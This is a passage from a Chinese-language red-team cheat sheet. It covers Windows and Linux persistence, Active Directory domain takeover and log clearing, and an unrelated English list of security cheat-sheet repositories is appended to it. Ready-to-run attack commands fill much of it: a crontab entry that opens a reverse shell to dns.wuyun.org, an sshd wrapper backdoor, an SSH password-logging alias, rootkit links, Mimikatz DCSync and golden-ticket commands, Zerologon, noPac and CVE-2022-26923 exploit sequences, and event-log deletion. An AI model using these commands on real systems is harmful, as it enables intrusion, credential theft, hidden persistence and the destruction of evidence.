注入到目标进程执行payload 每当目标进程启动,均会执行payload,相当于一个自启动的方式 POC : https://github.com/Cybellum/DoubleAgent ##### 19、[waitfor.exe ](https://3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence) 不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe POC : https://github.com/3gstudent/Waitfor-Persistence ##### 20、[AppDomainManager](https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence) 针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制 ##### 21、Office [劫持Office软件的特定功能](https://3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8):通过dll劫持,在Office软件执行特定功能时触发后门 [利用VSTO实现的office后门](https://3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8) [Office加载项](https://github.com/3gstudent/Office-Persistence) * Word WLL * Excel XLL * Excel VBA add-ins * PowerPoint VBA add-ins >参考1 :https://3gstudent.github.io/Use-Office-to-maintain-persistence >参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system ##### 22、[CLR](https://3gstudent.github.io/Use-CLR-to-maintain-persistence) 无需管理员权限的后门,并能够劫持所有.Net程序 POC:https://github.com/3gstudent/CLR-Injection ##### 23、[msdtc](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence) 利用MSDTC服务加载dll,实现自启动,并绕过Autoruns对启动项的检测 利用:向 %windir%\system32\目录添加dll并重命名为oci.dll ##### 24、[Hijack CAccPropServicesClass and MMDeviceEnumerato](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator) 利用COM组件,不需要重启系统,不需要管理员权限 通过修改注册表实现 POC:https://github.com/3gstudent/COM-Object-hijacking ##### 25、[Hijack explorer.exe](https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe) COM组件劫持,不需要重启系统,不需要管理员权限 通过修改注册表实现 ``` HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1} HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9} HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E} ``` ##### 26、Windows FAX DLL Injection 通过DLL劫持,劫持Explorer.exe对`fxsst.dll`的加载 Explorer.exe在启动时会加载`c:\Windows\System32\fxsst.dll`(服务默认开启,用于传真服务)将payload.dll保存在`c:\Windows\fxsst.dll`,能够实现dll劫持,劫持Explorer.exe对`fxsst.dll`的加载 ##### 27、特殊注册表键值 在注册表启动项创建特殊名称的注册表键值,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API)。 [《渗透技巧——"隐藏"注册表的创建》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA) [《渗透技巧——"隐藏"注册表的更多测试》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95) ##### 28、快捷方式后门 替换我的电脑快捷方式启动参数 POC : https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1 ##### 29、[Logon Scripts](https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence) ``` New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null ``` ##### 30、[Password Filter DLL](https://3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8) ##### 31、[利用BHO实现IE浏览器劫持](https://3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81) #### Linux ##### crontab 每60分钟反弹一次shell给dns.wuyun.org的53端口 ``` #!bash (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab - ``` ##### 硬链接sshd ``` #!bash ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333; ``` 链接:ssh root@192.168.206.142 -p 2333 ##### SSH Server wrapper ``` #!bash cd /usr/sbin mv sshd ../bin echo '#!/usr/bin/perl' >sshd echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd chmod u+x sshd //不用重启也行 /etc/init.d/sshd restart ``` ``` socat STDIO TCP4:192.168.206.142:22,sourceport=13377 ``` ##### SSH keylogger vim当前用户下的.bashrc文件,末尾添加 ``` #!bash alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh' ``` source .bashrc ##### Cymothoa_进程注入backdoor ``` ./cymothoa -p 2270 -s 1 -y 7777 ``` ``` nc -vv ip 7777 ``` ##### rootkit * [openssh_rootkit](http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz) * [Kbeast_rootkit ](http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz) * Mafix + Suterusu rootkit ##### Tools * [Vegile ](https://github.com/Screetsec/Vegile) * [backdoor ](https://github.com/icco/backdoor) ### WEB后门 PHP Meterpreter后门 Aspx Meterpreter后门 weevely webacoo .... ## 横向渗透 ### 端口渗透 #### 端口扫描 * 1.端口的指纹信息(版本信息) * 2.端口所对应运行的服务 * 3.常见的默认端口号 * 4.尝试弱口令 #### 端口爆破 [hydra ](https://github.com/vanhauser-thc/thc-hydra) #### 端口弱口令 * NTScan * Hscan * 自写脚本 #### 端口溢出 **smb** * ms08067 * ms17010 * ms11058 * ... **apache** **ftp** **...** #### 常见的默认端口 ##### 1、web类(web漏洞/敏感目录) 第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix ... ``` 80 web 80-89 web 8000-9090 web ``` ##### 2、数据库类(扫描弱口令) ``` 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL 50000 DB2 ``` ##### 3、特殊服务类(未授权/命令执行类/漏洞) ``` 443 SSL心脏滴血 445 ms08067/ms11058/ms17010等 873 Rsync未授权 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授权 7001,7002 WebLogic默认弱口令,反序列 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 50000 SAP命令执行 50070,50030 hadoop默认端口未授权访问 ``` ##### 4、常用端口类(扫描弱口令/端口爆破) ``` 21 ftp 22 SSH 23 Telnet 445 SMB弱口令扫描 2601,2604 zebra路由,默认密码zebra 3389 远程桌面 ``` ##### 5、端口合计所对应的服务 ``` 21 ftp 22 SSH 23 Telnet 25 SMTP 53 DNS 69 TFTP 80 web 80-89 web 110 POP3 135 RPC 139 NETBIOS 143 IMAP 161 SNMP 389 LDAP 443 SSL心脏滴血以及一些web漏洞测试 445 SMB 512,513,514 Rexec 873 Rsync未授权 1025,111 NFS 1080 socks 1158 ORACLE EMCTL2601,2604 zebra路由,默认密码zebra案 1433 MSSQL (暴力破解) 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主机管理系统登陆 (国外用较多) 2222 DA虚拟主机管理系统登陆 (国外用较多) 2601,2604 zebra路由,默认密码zebra 3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了 3306 MySQL (暴力破解) 3312/3311 kangle主机管理系统登陆 3389 远程桌面 3690 svn 4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 4848 GlassFish web中间件 弱口令:admin/adminadmin 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 6379 redis未授权 7001,7002 WebLogic默认弱口令,反序列 7778 Kloxo主机控制面板登录 8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 8080 tomcat/WDCd/ 主机管理系统,默认弱口令 8080,8089,9090 JBOSS 8081 Symantec AV/Filter for MSE 8083 Vestacp主机管理系统 (国外用较多) 8649 ganglia 8888 amh/LuManager 主机管理系统默认端口 9000 fcgi fcig php执行 9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 10000 Virtualmin/Webmin 服务器虚拟主机管理系统 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 28017 mongodb统计页面 50000 SAP命令执行 50060 hadoop 50070,50030 hadoop默认端口未授权访问 ``` ### 域渗透 #### 信息搜集 ##### powerview.ps1 ``` Get-NetDomain - gets the name of the current user's domain Get-NetForest - gets the forest associated with the current user's domain Get-NetForestDomains - gets all domains for the current forest Get-NetDomainControllers - gets the domain controllers for the current computer's domain Get-NetCurrentUser - gets the current [domain\]username Get-NetUser - returns all user objects, or the user specified (wildcard specifiable) Get-NetUserSPNs - gets all user ServicePrincipalNames Get-NetOUs - gets data for domain organization units Get-NetGUIDOUs - finds domain OUs linked to a specific GUID Invoke-NetUserAdd - adds a local or domain user Get-NetGroups - gets a list of all current groups in the domain Get-NetGroup - gets data for each user in a specified domain group Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts Invoke-NetGroupUserAdd - adds a user to a specified local or domain group Get-NetComputers - gets a list of all current servers in the domain Get-NetFileServers - get a list of file servers used by current domain users Get-NetShare - gets share information for a specified server Get-NetLoggedon - gets users actively logged onto a specified server Get-NetSessions - gets active sessions on a specified server Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles Get-NetConnections - gets active connections to a specific server resource (share) Get-NetFiles - gets open files on a server Get-NetProcesses - gets the remote processes and owners on a remote server ``` PowerView-2.0-tricks: ``` https://gist.github.com/HarmJ0y/3328d954607d71362e3c ``` PowerView-3.0-tricks ``` https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 ``` ##### BloodHound **获取某OU下所有机器信息** ``` { "name": "Find the specificed OU computers", "queryList": [ { "final": false, "title": "Select a OU...", "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC" }, { "final": true, "query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p", "allowCollapse": true, "endNode": "{}" } ] } ``` **自动标记owned用户及机器** [SyncDog](https://github.com/Lz1y/SyncDog) ##### 获取域内DNS信息 * [adidnsdump](https://github.com/dirkjanm/adidnsdump) * [域渗透——DNS记录的获取](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96) ​ #### 获取域控的方法 ##### SYSVOL SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。 相关阅读: * [寻找SYSVOL里的密码和攻击GPP(组策略偏好) ](https://www.secpulse.com/archives/42175.html) * [Windows Server 2008 R2之四管理Sysvol文件夹 ](http://blog.51cto.com/ycrsjxy/203095) * [SYSVOL中查找密码并利用组策略首选项 ](https://adsecurity.org/?p=2288) * [利用SYSVOL还原组策略中保存的密码](https://xz.aliyun.com/t/1653) ##### MS14-068 Kerberos ``` python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机 ``` 利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书: ``` mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit net use k: \pentest.comc$ ``` 相关阅读 : * [Kerberos的工具包PyKEK](http://adsecurity.org/?p=676) * [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html) * [Kerberos的安全漏洞](https://adsecurity.org/?p=541) ##### SPN扫描 Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。 SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。 SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。 相关阅读 : * [非扫描式的SQL Server发现](https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/) * [SPN扫描](https://adsecurity.org/?p=1508) * [扫描SQLServer的脚本](https://github.com/PyroTek3/PowerShell-AD-Recon) ##### Kerberos的黄金门票 在域上抓取的哈希 ``` lsadump::dcsync /domain:pentest.com /user:krbtgt ``` ``` kerberos::purge kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi kerberos::ptt administrator.kiribi kerberos::tgt net use k: \pnet use k: \pentest.comc$ ``` 相关阅读 : * https://adsecurity.org/?p=1640 * [域服务账号破解实践](http://bobao.360.cn/learning/detail/3564.html) * [Kerberos的认证原理](https://blog.csdn.net/wulantian/article/details/42418231) * [深刻理解windows安全认证机制ntlm&Kerberos](https://klionsec.github.io/2016/08/10/ntlm-kerberos/) ##### Kerberos的银票务 黄金票据和白银票据的一些区别: Golden Ticket:伪造`TGT`,可以获取`任何Kerberos`服务权限 银票:伪造TGS,`只能访问指定的服务` 加密方式不同: Golden Ticket由`krbtgt`的hash加密 Silver Ticket由`服务账号`(通常为计算机账户)Hash加密 认证流程不同: 金票在使用的过程需要同域控通信 银票在使用的过程不需要同域控通信 相关阅读 : * [攻击者如何使用Kerberos的银票来利用系统](https://adsecurity.org/?p=2011) * [域渗透——Pass The Ticket](https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf) ##### 域服务账号破解 与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户 ``` setspn -T PENTEST.com -Q */* ``` 从Mimikatz的RAM中提取获得的门票 ``` kerberos::list /export ``` 用rgsrepcrack破解 ``` tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` ##### 凭证盗窃 从搜集的密码里面找管理员的密码 ##### NTLM relay * [One API call away from Domain Admin](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/) * [privexchange](https://github.com/dirkjanm/privexchange/) * [Exchange2domain](https://github.com/ridter/exchange2domain) 用于主动让目标机器发起NTLM请求的方法: * [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) * [PetitPotam](https://github.com/topotam/PetitPotam) Relay LDAP: * [CVE-2019-1040-dcpwn](https://github.com/Ridter/CVE-2019-1040-dcpwn) Relay AD CS/PKI: * [AD CS/PKI template exploit](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/) 集成几个利用的工具: * [Relayx](https://github.com/Ridter/Relayx) 内网445端口转发: * [PortBender](https://github.com/praetorian-inc/PortBender) ##### Kerberos委派 * [Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [s4u2pwnage](https://blog.harmj0y.net/activedirectory/s4u2pwnage/) * [Attacking Kerberos Delegation](https://xz.aliyun.com/t/2931) * [用打印服务获取域控](https://adsecurity.org/?p=4056) * [Computer Takeover](https://blog.harmj0y.net/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/) * [Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/) * [CVE-2019-1040](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) ##### 地址解析协议 实在搞不定再搞ARP ##### Zerologon 1、利用Mimikatz **check** ``` lsadump::zerologon /target:dc1.exploit.local /account:dc1$ ``` **exploit** ``` lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit ``` **dcsync** ``` lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt ``` **restore** ``` lsadump::postzerologon /target:conttosson.locl /account:dc$ ``` 2、利用impacket: * 取目标主机名+IP * install 修改版本的impacket * Exp ``` python cve-2020-1472-exploit.py DC2008 10.211.55.200 ``` ![](https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190137.png) ``` secretsdump.py -no-pass cgdomain.com/'DC2008$'@10.211.55.200 -history -just-dc-user administrator ``` ``` secretsdump.py -no-pass cgdomain.com/administrator@10.211.55.200 -hashes aad3b435b51404eeaad3b435b51404ee:3add1560657a19b3166247eb3eb149ae ``` ![](https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190359.png) 获取到旧的密码明文hex,还原 ``` python restorepassword.py cgdomain.com/DC2008@DC2008 -target-ip 10.211.55.200 -hexpass 59958639cbdd4523de5d42b01adb0e256e0d39aef14c8eef31f4c078862109f253bbb7b3817ab123d013856c028fa4993f5f5b9a830a3a98d87483b29df3fb55082a1f464b19220a2c04f6605d2d321a04afbb551f8f19a13d399f9f5af2aa23c5b76b49001033516fefd90cb0348256e8282b22cbf9e70d82a8b8d2916d578246e288af3af727533d36ad8950fe1c513771377d98a947c4a8eae2b581a74b6687a2e533b7e89e8d03c2e6c2123d519489869a6e33d3a8884be33107060b62e2852502261f48c097ddb68750cc55b7688cc951441cf02989a307f55c008e978edbaf31766d17b53505016c7580cb480b ``` ![](https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190457.png) 恢复方法2 通过wmic, pass the hash 拿到域控制器中的本地管理员权限(域管) ``` wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/Administrator@10.211.55.38 ``` 然后分别执行,拷贝本机中SAM数据库到本地 ``` - reg save HKLM\SYSTEM system.save - reg save HKLM\SAM sam.save - reg save HKLM\SECURITY security.save - get system.save - get sam.save - get security.save - del /f system.save - del /f sam.save - del /f security.save ``` 提取明文hash ``` secretsdump.py -sam sam.save -system system.save -security security.save LOCAL ``` 然后恢复。 ​ ##### noPac 漏洞分析:[CVE-2021-42287/CVE-2021-42278 Weaponisation](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) Exploit: ``` # Create Machine Account New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose # Clear SPNs Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose # Change Machine Account samaccountname Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose # Request TGT .\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap # Change Machine Account samaccountname Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose # Request S4U2self .\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT] ``` 一键利用:[noPac](https://github.com/cube0x0/noPac) ##### ADCS 利用ADCS中错误配置的模板进行域提权,详细可参考:[Certified_Pre-Owned](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) 可利用工具: * [Certify](https://github.com/GhostPack/Certify) * [Certipy](https://github.com/ly4k/Certipy) * [PKINITtools](https://github.com/dirkjanm/PKINITtools) * [certi](https://github.com/eloypgz/certi) ##### CVE-2022-26923 前提:域内有ADCS Exploit: ``` # 修改可控机器DNS python certi.py account create cgdomain.com/sanfeng:'1qazXSW@'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns dc2008.cgdomain.com # 请求证书 python certi.py req 'cgdomain.com/testvul$:NUxhMemzaP4rsPnu'@10.211.55.200 -dc-ip 10.211.55.200 -ca cgdomain-DC2008-CA -template 'Machine' # 获取DC hash python certi.py auth -dc-ip 10.211.55.200 -pfx dc2008.pfx -username dc2008$ # 还原机器DNS python certi.py account update cgdomain.com/sanfeng:'1qazXSW@'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns testvul.hqcec.com ``` >注:此环境的ADCS与DC为同一台机器。真实环境需要根据实际情况进行参数调整。 #### 获取AD哈希 * 使用VSS卷影副本 * Ntdsutil中获取NTDS.DIT​​文件 * PowerShell中提取NTDS.DIT -->[Invoke-NinaCopy ](https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy) * 使用Mimikatz提取 ``` mimikatz lsadump::lsa /inject exit ``` * 使用PowerShell Mimikatz * 使用Mimikatz的DCSync 远程转储Active Directory凭证 提取 KRBTGT用户帐户的密码数据: ``` Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit ``` 管理员用户帐户提取密码数据: ``` Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit ``` * NTDS.dit中提取哈希 使用esedbexport恢复以后使用ntdsxtract提取 #### AD持久化 ##### 活动目录持久性技巧 https://adsecurity.org/?p=1929 DS恢复模式密码维护 DSRM密码同步 >Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html) [DCshadow ](https://www.dcshadow.com/) ##### Security Support Provider 简单的理解为SSP就是一个DLL,用来实现身份认证 ``` privilege::debug misc::memssp ``` 这样就不需要重启`c:/windows/system32`可看到新生成的文件kiwissp.log ##### [SID History](https://adsecurity.org/?p=1772) SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户 ``` mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator" ``` ##### [AdminSDHolder&SDProp ](https://adsecurity.org/?p=1906) 利用AdminSDHolder&SDProp(重新)获取域管理权限 ##### 组策略 https://adsecurity.org/?p=2716 [策略对象在持久化及横向渗透中的应用](https://www.anquanke.com/post/id/86531) ##### Hook PasswordChangeNotify http://www.vuln.cn/6812 ##### Kerberoasting后门 [域渗透-Kerberoasting](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting) ##### AdminSDHolder [Backdooring AdminSDHolder for Persistence](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) ##### Delegation [Unconstrained Domain Persistence](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence) ##### 黄金证书 [certified-pre-owned](https://blog.harmj0y.net/activedirectory/certified-pre-owned/) 证书伪造: [pyForgeCert](https://github.com/Ridter/pyForgeCert) #### 其他 ##### 域内主机提权 [SharpAddDomainMachine](https://github.com/Ridter/SharpAddDomainMachine ) ##### Exchange的利用 * [**owa_info**](https://github.com/ridter/owa_info) * [**Exchange2domain**](https://github.com/Ridter/Exchange2domain) * [**CVE-2018-8581**](https://github.com/WyAtu/CVE-2018-8581/) * [**CVE-2019-1040**](https://github.com/Ridter/CVE-2019-1040) * [**CVE-2020-0688**](https://github.com/Ridter/CVE-2020-0688) * [**NtlmRelayToEWS**](https://github.com/Arno0x/NtlmRelayToEWS) * [**ewsManage**](https://github.com/3gstudent/ewsManage) * [**CVE-2021-26855**](https://github.com/h4x0r-dz/CVE-2021-26855) * [**CVE-2021-28482**](https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda) * [**ProxyVulns**](https://github.com/hosch3n/ProxyVulns) * [**ProxyNotShell**](https://github.com/testanull/ProxyNotShell-PoC) * [**OWASSRF-ProxyNotShell**](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC) * [**Tabshell**](https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e) #### TIPS [《域渗透——Dump Clear-Text Password after KB2871997 installed》](https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed) [《域渗透——Hook PasswordChangeNotify》](http://www.vuln.cn/6812) >可通过Hook PasswordChangeNotify实时记录域控管理员的新密码 [《域渗透——Local Administrator Password Solution》 ](http://www.liuhaihua.cn/archives/179102.html) >域渗透时要记得留意域内主机的本地管理员账号 [《域渗透——利用SYSVOL还原组策略中保存的密码》 ](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81) #### 相关工具 * [BloodHound ](https://github.com/BloodHoundAD/BloodHound) * [CrackMapExec ](https://github.com/byt3bl33d3r/CrackMapExec) * [DeathStar](https://github.com/byt3bl33d3r/DeathStar) >利用过程:http://www.freebuf.com/sectool/160884.html ### 在远程系统上执行程序 * At * Psexec * WMIC * Wmiexec * Smbexec * Powershell remoting * DCOM * Winrm (https://github.com/Hackplayers/evil-winrm) ### IOT相关 * 1、路由器 [routersploit ](https://github.com/reverse-shell/routersploit) * 2、打印机 [PRET ](https://github.com/RUB-NDS/PRET) * 3、IOT exp https://www.exploitee.rs/ * 4、相关 [OWASP-Nettacker](https://www.owasp.org/index.php/OWASP_Nettacker) [isf](https://github.com/dark-lbp/isf) [icsmaster](https://github.com/w3h/icsmaster) ### 中间人 * [Cain](http://www.oxid.it/cain.html) * [Ettercap](https://github.com/Ettercap/ettercap) * [Responder](https://github.com/SpiderLabs/Responder) * [MITMf](https://github.com/byt3bl33d3r/MITMf) * [3r/MITMf)](https://github.com/evilsocket/bettercap) ### 规避杀软及检测 #### Bypass Applocker [UltimateAppLockerByPassList ](https://github.com/api0cradle/UltimateAppLockerByPassList) https://lolbas-project.github.io/ #### BypassAV * Empire * PEspin * Shellter * Ebowla * Veil * PowerShell * Python * [代码注入技术Process Doppelgänging ](http://www.4hou.com/technology/9379.html) * ... ## 痕迹清理 ### [Windows日志清除](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87) 获取日志分类列表: ``` wevtutil el >1.txt ``` 获取单个日志类别的统计信息: eg. ``` wevtutil gli "windows powershell" ``` 回显: ``` creationTime: 2016-11-28T06:01:37.986Z lastAccessTime: 2016-11-28T06:01:37.986Z lastWriteTime: 2017-08-08T08:01:20.979Z fileSize: 1118208 attributes: 32 numberOfLogRecords: 1228 oldestRecordNumber: 1 ``` 查看指定日志的具体内容: ``` wevtutil qe /f:text "windows powershell" ``` 删除单个日志类别的所有信息: ``` wevtutil cl "windows powershell" ``` ### 破坏Windows日志记录功能 利用工具 * [Invoke-Phant0m](https://github.com/hlldz/Invoke-Phant0m) * [Windwos-EventLog-Bypass](https://github.com/3gstudent/Windwos-EventLog-Bypass) ### Metasploit ``` run clearlogs ``` ``` clearev ``` ### 3389登陆记录清除 ``` @echo off @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f @del "%USERPROFILE%\My Documents\Default.rdp" /a @exit ```
# Cheat sheets If you want to clone all of these locally I have a repo with all of them as submodules and you can clone them all with `git clone --recursive --jobs 8 https://github.com/FalsePhilosopher/Infosec-Cheatsheets` https://github.com/OriolOriolOriol/Active-Directory-Cheat-Sheet https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet https://github.com/LeCoupa/awesome-cheatsheets (Everything) https://github.com/myugan/awesome-cicd-security https://github.com/4ndersonLin/awesome-cloud-security https://github.com/Kristories/awesome-guidelines https://github.com/edoardottt/awesome-hacker-search-engines https://github.com/Hack-with-Github/Awesome-Hacking https://github.com/vitalysim/Awesome-Hacking-Resources https://github.com/zazaalaza/awesome-ideation-tools https://github.com/jivoi/awesome-osint https://github.com/lorien/awesome-pastebin https://github.com/enaqx/awesome-pentest https://github.com/coreb1t/awesome-pentest-cheat-sheets https://github.com/m0nad/awesome-privilege-escalation https://github.com/p0dalirius/Awesome-RCE-techniques https://github.com/RistBS/Awesome-RedTeam-Cheatsheet https://github.com/sbilly/awesome-security https://github.com/0x4D31/awesome-threat-detection https://github.com/onceupon/Bash-Oneliner 